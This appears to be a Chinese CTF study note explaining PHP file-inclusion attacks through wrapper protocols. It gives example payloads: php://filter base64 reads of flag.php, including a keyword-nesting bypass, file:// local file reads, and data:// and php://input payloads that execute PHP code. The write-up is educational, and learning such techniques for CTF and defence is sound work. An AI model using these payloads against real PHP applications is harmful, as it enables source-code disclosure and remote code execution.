当题目中用到file_get_contents()函数时,要想到用协议来读取文件内容

封装协议:

/secr3t.php  ?file=php://filter/convert.base64-encode/resource=  flag.php

前面是url     ?后面是封装协议(中间一块都是一样的)               resource后面是要访问的地址。

 

filter伪协议可以套一层参数,如(本题中包含woofers,meowers,index三个中的一个即可):

?file=php://filter/read=convert.base64-encode/woofers/resource=flag 或

?file=php://filter/read=index/convert.base64-encode/resource=flag (顺序可以变换)

 

 

伪协议:

要成功应用伪协议需要php.ini文件的allow_url_fopen      默认开启

                allow_url_include    默认关闭

file://伪协议

此协议可以在双off的情况下使用,用于访问本地文件

使用方法:file://文件绝对路径和文件名    如http://127.0.0.1/cmd.php?file=file://D:/soft/phpStudy/WWW/phpcode.txt

 

data://text/plain协议

此协议需要在双on的情况下才能使用,很常用的数据流构造器,将读取后面base编码字符串后解码的数据作为数据流的输入

使用方法:data://text/plain;base64,base64编码字符  如http://127.0.0.1/cmd.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

     data://text/plain,字符   如http://127.0.0.1/cmd.php?file=data://text/plain,<?php phpinfo()?> plain后写要传入的内容。

 

php://input协议

此协议需要allow_url_include为on,可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。

使用方法:php://input,然后post需要执行的数据 如http://127.0.0.1/cmd.php?file=php://input    然后在post中<?php phpinfo() ?>

 

有张图可以看下

 

版权声明:本文为heartbeat111原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/heartbeat111/p/16423349.html